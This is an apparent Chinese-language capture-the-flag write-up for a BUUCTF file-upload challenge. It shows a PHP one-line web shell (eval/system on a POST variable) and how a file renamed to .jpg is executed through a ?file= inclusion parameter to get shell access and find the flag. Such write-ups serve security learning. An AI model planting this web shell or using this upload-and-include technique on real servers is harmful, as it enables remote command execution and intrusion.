BUU UPLOAD COURSE 1

知识点

一句话

审题

就不审了 就是个上传

解题

一句话木马肯定很多人都知道 但是肯定有一部分人还停留在只会把马传上去然后菜刀连接的阶段(暗示自己 回到题目 题目没有设置上传后缀的限制 但是上传之后任意后缀形式都会被改成.jpg格式 也就是说 如果只是单纯的上传了马 那么被以jpg格式储存之后 直接用菜刀是连不上的

我们随便上传一个php文件

1
<?php echo 'Hello World!'; ?>

虽然是以jpg格式储存 但是当我们包含这个文件的时候 返回了Hello world 说明后台将这个jpg当作php了

下面稍微讲一下这个一句话

1
<?php @eval(system($_POST["x"]));?>

当这条语句被服务端执行了,我们同时利用 POST 请求上传变量 x 的值,例如 x=echo ‘Hello’
php 解析器执行的实质上是 @eval(“echo ‘Hello’”),即在前端输出一个字符串
更常见的利用手法是利用 @eval(system($_POST[“x”])) 直接控制服务端的 shell

我们上传之后 不能直接访问xxx/uploads/xxxxx.jpg 那样只是预览这个文件 而起不到调用这个文件的作用 当然我记得如果是个php后缀的马好像就直接预览就行了

1
http://331c5aef-7929-44fa-b2c1-cef10026df1e.node3.buuoj.cn/?file=uploads/5fc7887283d67.jpg

这样之后 打开postman慢慢找就可以了

最后找到flag

EOF